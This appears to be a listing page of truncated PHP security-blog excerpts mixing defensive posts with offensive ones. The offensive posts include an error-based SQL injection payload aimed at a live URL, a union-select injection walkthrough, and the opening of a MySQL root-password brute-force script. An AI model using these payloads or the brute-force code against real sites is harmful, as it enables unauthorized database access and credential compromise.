PHP遍历单目录可写权限脚本
PHP遍历单目录可写权限脚本 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <htm...
php+mysql高级爆错注入经测算有效
之前想找个测试 没想到这有 可以测试下做个记录而已 http://webshell.cc/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0...
PHP Mysql 密码暴力破解,root密码破解 源码
<? set_time_limit(0); //脚本不超时 $ip = "localhost"; //IP $user = "root"; //用户名 $passwd = file("password.txt"); //密码字典 for($i=0; $i<count($passwd); $i++){ $pass = Str_Replace("\r\n", "", $passwd[$i]...
PHP Web 木马扫描器代码
scanner.php: <?php /**************PHP Web木马扫描器************************/ /* [+] 作者: alibaba */ /* [+] QQ: 1499281192 */ /* [+] MSN: weeming21@hotmail.com */ /* [+] 首发: t00ls.net , 转载请注明t00ls */ /* [...
PHP 5.3.9 - 修补重大Hash冲突漏洞
PHP 5.3.9正式版发布了。 此次更新修复了诸多BUG,如Hash冲突漏洞,对于5.3.8的用户,要速度更新。 Security Enhancements and Fixes in PHP 5.3.9: Added max_input_vars directive to prevent attacks based on hash collisions. (CVE-2011-4885) (HAS...
PHP批量检查网站的sitemap是否存在
文章转载,话不多说,代码其实可以改的更好点。 <?php $webfile = "sitexml.txt"; $opensite = fopen($webfile, 'r'); function curl($url) { /* * 测试用的浏览器信息 * */ $browsers = array ( "user_agent" => "Mozilla/5.0 (Windows; U; W...
php设置刷新的间隔时间防护cc攻击
最近几个网站CC不断,了解一下CC的原理,然后勉强找个方法暂时防护下吧。实在是伤不起。 附上现在被攻击的屏蔽截图 <?php @session_start(); $allow_sep = "1"; //刷新时间 if (isset($_SESSION["post_sep"])) { if (time() - $_SESSION["pos...
PHP站点安全检测和防范
今天我们讲讲PHP注入的安全规范,防止自己的网站被sql注入。首先我分析了这站的几个页面 https://www.webshell.cc/show.?id=2227 https://www.webshell.cc/show.php?id=2314 通过最简单的and 1 //and2 这样的注入,我并没有发现问题,但是经过一段时间的研...
win+php+mysql 注入实战篇
https://www.webshell.cc/answer_view.php?id=10291' //有注入 //常理走:报表。现在mysql几乎都是高级版本。所以一般就不猜测它的版本了。 https://www.webshell.cc/answer_view.php?id=10291%20and%202=4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12...
PHP在线打包和解压工具
很久以前的东西了。。。留个记录 以后还得用。。。。。 下载: unzip